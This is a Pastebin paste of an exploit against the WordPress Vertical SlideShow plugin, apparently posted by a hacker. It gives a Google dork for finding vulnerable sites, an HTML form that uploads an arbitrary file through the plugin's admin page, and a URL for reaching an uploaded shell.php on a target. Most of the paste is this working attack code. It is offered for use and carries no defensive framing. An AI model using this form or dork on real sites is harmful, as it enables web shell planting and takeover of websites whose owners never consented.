Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!--
- \ \ / (_)_ __ _ _ ___\ \/ / _ \ ____
- \ \ / /| | '__| | | / __|\ /| | | |_ /
- \ V / | | | | |_| \__ \/ \| |_| |/ /
- \_/ |_|_| \__,_|___/_/\_\____//___|
- -->
- #########################################################
- #Exploit Title: Exploit Wordpress Arbitrary File Upload Vulnerability in Vertical SlideShow
- #Category: webapps
- #Google Dork : inurl:/wp-content/plugins/wp-vertical-gallery/
- #########################################################
- [+] Proof of Concept:
- The following proof of concept will create a new category in the plugin, with
- the selected file as the Category Image. If there are no pre-existing categories
- the uploaded file will be located in the directory
- /wp-content/uploads/vertical/1_uploadfolder/big/.
- replace “[path to WordPress]” with the location of WordPress.
- <html>
- <body>
- <form action="http://[path to WordPress]/wp-admin/admin.php?page=vertical_manage" method="POST" enctype="multipart/form-data">
- <input type="hidden" name="task" value="vrt_add_new_album" />
- <input type="hidden" name="album_name" value="Arbitrary File Upload" />
- <input type="hidden" name="album_desc" value="Arbitrary File Upload" />
- <input type="file" name="album_img" value="" />
- <input type="submit" value="Submit" />
- </form>
- </body>
- </html
- [+]shell access:
- http://www.Target.com/wp-content/uploads/vertical/1_uploadfolder/big/shell.php
- Video
- https://youtu.be/54ytssnD1JQ
- Bye..
- Algerien Hacker
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement